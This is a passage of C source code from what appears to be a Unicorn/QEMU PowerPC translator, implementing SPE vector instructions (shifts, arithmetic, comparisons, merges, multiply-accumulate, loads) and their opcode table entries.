rB(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rA(ctx->opcode)]); \ tcg_opi(tcg_ctx, t0, t0, rB(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ } GEN_SPEOP_TCG_LOGIC_IMM2(evslwi, tcg_gen_shli_i32); GEN_SPEOP_TCG_LOGIC_IMM2(evsrwiu, tcg_gen_shri_i32); GEN_SPEOP_TCG_LOGIC_IMM2(evsrwis, tcg_gen_sari_i32); GEN_SPEOP_TCG_LOGIC_IMM2(evrlwi, tcg_gen_rotli_i32); /* SPE arithmetic */ #define GEN_SPEOP_ARITH1(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rA(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ } GEN_SPEOP_ARITH1(evabs, tcg_gen_abs_i32); GEN_SPEOP_ARITH1(evneg, tcg_gen_neg_i32); GEN_SPEOP_ARITH1(evextsb, tcg_gen_ext8s_i32); GEN_SPEOP_ARITH1(evextsh, tcg_gen_ext16s_i32); static inline void gen_op_evrndw(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1) { tcg_gen_addi_i32(tcg_ctx, ret, arg1, 0x8000); tcg_gen_ext16u_i32(tcg_ctx, ret, ret); } GEN_SPEOP_ARITH1(evrndw, gen_op_evrndw); 
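/* * Note on the SPE register model used throughout this file: each 64-bit * SPE register is kept as a pair of 32-bit halves, cpu_gpr[] holding the * low word and cpu_gprh[] the high word (see gen_load_gpr64 and * gen_store_gpr64 above, which concatenate and split the pair). The * GEN_SPEOP_ARITH1/GEN_SPEOP_LOGIC2 macros apply the same 32-bit TCG op * to both halves independently; for example, GEN_SPEOP_ARITH1(evneg, * tcg_gen_neg_i32) negates the high and low words of rA separately * rather than treating the register as one 64-bit value. */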
GEN_SPEOP_ARITH1(evcntlsw, gen_helper_cntlsw32); GEN_SPEOP_ARITH1(evcntlzw, gen_helper_cntlzw32); #define GEN_SPEOP_ARITH2(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0, t1; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, t1); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rA(ctx->opcode)]); \ tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gprh[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, t1); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } static inline void gen_op_evsrwu(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); /* No error here: 6 bits are used */ tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x3F); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, t0, 32, l1); tcg_gen_shr_i32(tcg_ctx, ret, arg1, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_i32(tcg_ctx, ret, 0); gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evsrwu, gen_op_evsrwu); static inline void gen_op_evsrws(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); /* No error here: 6 bits are used */ tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x3F); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, t0, 32, l1); tcg_gen_sar_i32(tcg_ctx, ret, arg1, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_i32(tcg_ctx, ret, 0); gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evsrws, gen_op_evsrws); static inline void gen_op_evslw(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); /* No error here: 6 bits are used */ tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x3F); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GE, t0, 32, l1); tcg_gen_shl_i32(tcg_ctx, ret, arg1, t0); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_i32(tcg_ctx, ret, 0); gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evslw, gen_op_evslw); static inline void gen_op_evrlw(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, arg2, 0x1F); tcg_gen_rotl_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } GEN_SPEOP_ARITH2(evrlw, gen_op_evrlw); static inline void gen_evmergehi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); } GEN_SPEOP_ARITH2(evaddw, tcg_gen_add_i32); static inline void gen_op_evsubf(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { tcg_gen_sub_i32(tcg_ctx, ret, arg2, arg1); } 
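/* * gen_op_evsubf computes arg2 - arg1. Through GEN_SPEOP_ARITH2 the first * operand is the rA half and the second the rB half, so evsubfw yields * rB - rA in each 32-bit word ("subtract from", matching the PowerPC * subf operand convention). */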
GEN_SPEOP_ARITH2(evsubfw, gen_op_evsubf); /* SPE arithmetic immediate */ #define GEN_SPEOP_ARITH_IMM2(name, tcg_op) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ t0 = tcg_temp_new_i32(tcg_ctx); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, rA(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); \ \ tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gprh[rB(ctx->opcode)]); \ tcg_op(tcg_ctx, t0, t0, rA(ctx->opcode)); \ tcg_gen_extu_i32_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); \ \ tcg_temp_free_i32(tcg_ctx, t0); \ } GEN_SPEOP_ARITH_IMM2(evaddiw, tcg_gen_addi_i32); GEN_SPEOP_ARITH_IMM2(evsubifw, tcg_gen_subi_i32); /* SPE comparison */ #define GEN_SPEOP_COMP(name, tcg_cond) \ static inline void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->spe_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_SPEU); \ return; \ } \ TCGLabel *l1 = gen_new_label(tcg_ctx); \ TCGLabel *l2 = gen_new_label(tcg_ctx); \ TCGLabel *l3 = gen_new_label(tcg_ctx); \ TCGLabel *l4 = gen_new_label(tcg_ctx); \ \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gprh[rA(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); \ tcg_gen_ext32s_tl(tcg_ctx, cpu_gprh[rB(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); \ \ tcg_gen_brcond_tl(tcg_ctx, tcg_cond, cpu_gpr[rA(ctx->opcode)], \ cpu_gpr[rB(ctx->opcode)], l1); \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], 0); \ tcg_gen_br(tcg_ctx, l2); \ gen_set_label(tcg_ctx, l1); \ tcg_gen_movi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], \ CRF_CL | CRF_CH_OR_CL | CRF_CH_AND_CL); \ gen_set_label(tcg_ctx, l2); \ tcg_gen_brcond_tl(tcg_ctx, tcg_cond, cpu_gprh[rA(ctx->opcode)], \ cpu_gprh[rB(ctx->opcode)], l3); \ tcg_gen_andi_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfD(ctx->opcode)], \ ~(CRF_CH | CRF_CH_AND_CL)); \ tcg_gen_br(tcg_ctx, l4); \ gen_set_label(tcg_ctx, l3); \ tcg_gen_ori_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfD(ctx->opcode)], \ CRF_CH | CRF_CH_OR_CL); \ gen_set_label(tcg_ctx, l4); \ } GEN_SPEOP_COMP(evcmpgtu, TCG_COND_GTU); GEN_SPEOP_COMP(evcmpgts, TCG_COND_GT); GEN_SPEOP_COMP(evcmpltu, TCG_COND_LTU); GEN_SPEOP_COMP(evcmplts, TCG_COND_LT); GEN_SPEOP_COMP(evcmpeq, TCG_COND_EQ); /* SPE misc */ static inline void gen_brinc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Note: brinc is usable even if SPE is disabled */ gen_helper_brinc(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } static inline void gen_evmergelo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } static inline void gen_evmergehilo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); } static inline void gen_evmergelohi(DisasContext *ctx) { TCGContext *tcg_ctx = 
ctx->uc->tcg_ctx; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } if (rD(ctx->opcode) == rA(ctx->opcode)) { TCGv tmp = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, tmp, cpu_gpr[rA(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], tmp); tcg_temp_free(tcg_ctx, tmp); } else { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); } } static inline void gen_evsplati(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint64_t imm = ((int32_t)(rA(ctx->opcode) << 27)) >> 27; tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], imm); tcg_gen_movi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], imm); } static inline void gen_evsplatfi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint64_t imm = rA(ctx->opcode) << 27; tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], imm); tcg_gen_movi_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], imm); } static inline void gen_evsel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGLabel *l3 = gen_new_label(tcg_ctx); TCGLabel *l4 = gen_new_label(tcg_ctx); TCGv_i32 t0 = tcg_temp_local_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, cpu_crf[ctx->opcode & 0x07], 1 << 3); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, t0, 0, l1); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rB(ctx->opcode)]); gen_set_label(tcg_ctx, l2); tcg_gen_andi_i32(tcg_ctx, t0, cpu_crf[ctx->opcode & 0x07], 1 << 2); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, t0, 0, l3); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l4); gen_set_label(tcg_ctx, l3); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); gen_set_label(tcg_ctx, l4); tcg_temp_free_i32(tcg_ctx, t0); } static void gen_evsel0(DisasContext *ctx) { gen_evsel(ctx); } static void gen_evsel1(DisasContext *ctx) { gen_evsel(ctx); } static void gen_evsel2(DisasContext *ctx) { gen_evsel(ctx); } static void gen_evsel3(DisasContext *ctx) { gen_evsel(ctx); } /* Multiply */ static inline void gen_evmwumi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0, t1; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); /* t0 := rA; t1 := rB */ tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32u_i64(tcg_ctx, t0, t0); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_ext32u_i64(tcg_ctx, t1, t1); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); /* t0 := rA * rB */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); /* rD := t0 */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_evmwumia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 tmp; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } gen_evmwumi(ctx); /* rD := rA * rB */ tmp = tcg_temp_new_i64(tcg_ctx); /* acc := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); tcg_temp_free_i64(tcg_ctx, tmp); } static inline void gen_evmwumiaa(DisasContext *ctx) { 
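/* evmwumiaa: rD := rA * rB (via gen_evmwumi below), then ACC := ACC + rD and finally rD := ACC. */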
TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 acc; TCGv_i64 tmp; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } gen_evmwumi(ctx); /* rD := rA * rB */ acc = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); /* tmp := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); /* Load acc */ tcg_gen_ld_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* acc := tmp + acc */ tcg_gen_add_i64(tcg_ctx, acc, acc, tmp); /* Store acc */ tcg_gen_st_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* rD := acc */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), acc); tcg_temp_free_i64(tcg_ctx, acc); tcg_temp_free_i64(tcg_ctx, tmp); } static inline void gen_evmwsmi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0, t1; if (unlikely(!ctx->spe_enabled)) { gen_exception(ctx, POWERPC_EXCP_SPEU); return; } t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); /* t0 := rA; t1 := rB */ tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32s_i64(tcg_ctx, t0, t0); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_ext32s_i64(tcg_ctx, t1, t1); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); /* t0 := rA * rB */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); /* rD := t0 */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_evmwsmia(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 tmp; gen_evmwsmi(ctx); /* rD := rA * rB */ tmp = tcg_temp_new_i64(tcg_ctx); /* acc := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); tcg_gen_st_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); tcg_temp_free_i64(tcg_ctx, tmp); } static inline void gen_evmwsmiaa(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 acc; TCGv_i64 tmp; gen_evmwsmi(ctx); /* rD := rA * rB */ acc = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new_i64(tcg_ctx); /* tmp := rD */ gen_load_gpr64(tcg_ctx, tmp, rD(ctx->opcode)); /* Load acc */ tcg_gen_ld_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* acc := tmp + acc */ tcg_gen_add_i64(tcg_ctx, acc, acc, tmp); /* Store acc */ tcg_gen_st_i64(tcg_ctx, acc, tcg_ctx->cpu_env, offsetof(CPUPPCState, spe_acc)); /* rD := acc */ gen_store_gpr64(tcg_ctx, rD(ctx->opcode), acc); tcg_temp_free_i64(tcg_ctx, acc); tcg_temp_free_i64(tcg_ctx, tmp); } GEN_SPE(evaddw, speundef, 0x00, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evaddiw, speundef, 0x01, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evsubfw, speundef, 0x02, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evsubifw, speundef, 0x03, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evabs, evneg, 0x04, 0x08, 0x0000F800, 0x0000F800, PPC_SPE); //// GEN_SPE(evextsb, evextsh, 0x05, 0x08, 0x0000F800, 0x0000F800, PPC_SPE); //// GEN_SPE(evrndw, evcntlzw, 0x06, 0x08, 0x0000F800, 0x0000F800, PPC_SPE); //// GEN_SPE(evcntlsw, brinc, 0x07, 0x08, 0x0000F800, 0x00000000, PPC_SPE); // GEN_SPE(evmra, speundef, 0x02, 0x13, 0x0000F800, 0xFFFFFFFF, PPC_SPE); GEN_SPE(speundef, evand, 0x08, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE); //// GEN_SPE(evandc, speundef, 0x09, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evxor, evor, 0x0B, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evnor, eveqv, 0x0C, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evmwumi, evmwsmi, 0x0C, 0x11, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evmwumia, evmwsmia, 0x1C, 0x11, 0x00000000, 
0x00000000, PPC_SPE); GEN_SPE(evmwumiaa, evmwsmiaa, 0x0C, 0x15, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(speundef, evorc, 0x0D, 0x08, 0xFFFFFFFF, 0x00000000, PPC_SPE); //// GEN_SPE(evnand, speundef, 0x0F, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evsrwu, evsrws, 0x10, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evsrwiu, evsrwis, 0x11, 0x08, 0x00000000, 0x00000000, PPC_SPE); GEN_SPE(evslw, speundef, 0x12, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); //// GEN_SPE(evslwi, speundef, 0x13, 0x08, 0x00000000, 0xFFFFFFFF, PPC_SPE); GEN_SPE(evrlw, evsplati, 0x14, 0x08, 0x00000000, 0x0000F800, PPC_SPE); // GEN_SPE(evrlwi, evsplatfi, 0x15, 0x08, 0x00000000, 0x0000F800, PPC_SPE); GEN_SPE(evmergehi, evmergelo, 0x16, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evmergehilo, evmergelohi, 0x17, 0x08, 0x00000000, 0x00000000, PPC_SPE); //// GEN_SPE(evcmpgtu, evcmpgts, 0x18, 0x08, 0x00600000, 0x00600000, PPC_SPE); //// GEN_SPE(evcmpltu, evcmplts, 0x19, 0x08, 0x00600000, 0x00600000, PPC_SPE); //// GEN_SPE(evcmpeq, speundef, 0x1A, 0x08, 0x00600000, 0xFFFFFFFF, PPC_SPE); //// /* SPE load and stores */ static inline void gen_addr_spe_imm_index(DisasContext *ctx, TCGv EA, int sh) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong uimm = rB(ctx->opcode); if (rA(ctx->opcode) == 0) { tcg_gen_movi_tl(tcg_ctx, EA, uimm << sh); } else { tcg_gen_addi_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)], uimm << sh); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, EA); } } } static inline void gen_op_evldd(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); gen_qemu_ld64_i64(ctx, t0, addr); gen_store_gpr64(tcg_ctx, rD(ctx->opcode), t0); tcg_temp_free_i64(tcg_ctx, t0); } static inline void gen_op_evldw(DisasContext *ctx, TCGv addr) { gen_qemu_ld32u(ctx, cpu_gprh[rD(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 4); gen_qemu_ld32u(ctx, cpu_gpr[rD(ctx->opcode)], addr); } static inline void gen_op_evldh(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_or_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rD(ctx->opcode)], t0); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, 16); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlhhesplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, t0, t0, 16); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlhhousplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlhhossplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16s(ctx, t0, addr); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); 
tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlwhe(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, 16); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlwhou(DisasContext *ctx, TCGv addr) { gen_qemu_ld16u(ctx, cpu_gprh[rD(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16u(ctx, cpu_gpr[rD(ctx->opcode)], addr); } static inline void gen_op_evlwhos(DisasContext *ctx, TCGv addr) { gen_qemu_ld16s(ctx, cpu_gprh[rD(ctx->opcode)], addr); gen_addr_add(ctx, addr, addr, 2); gen_qemu_ld16s(ctx, cpu_gpr[rD(ctx->opcode)], addr); } static inline void gen_op_evlwwsplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld32u(ctx, t0, addr); tcg_gen_mov_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_evlwhsplat(DisasContext *ctx, TCGv addr) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_qemu_ld16u(ctx, t0, addr); tcg_gen_shli_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], t0, 16); tcg_gen_or_tl(tcg_ctx, cpu_gprh[rD(ctx->opcode)], cpu_gprh[rD(ctx->opcode)], t0); gen_addr_add(ctx, addr, addr, 2); 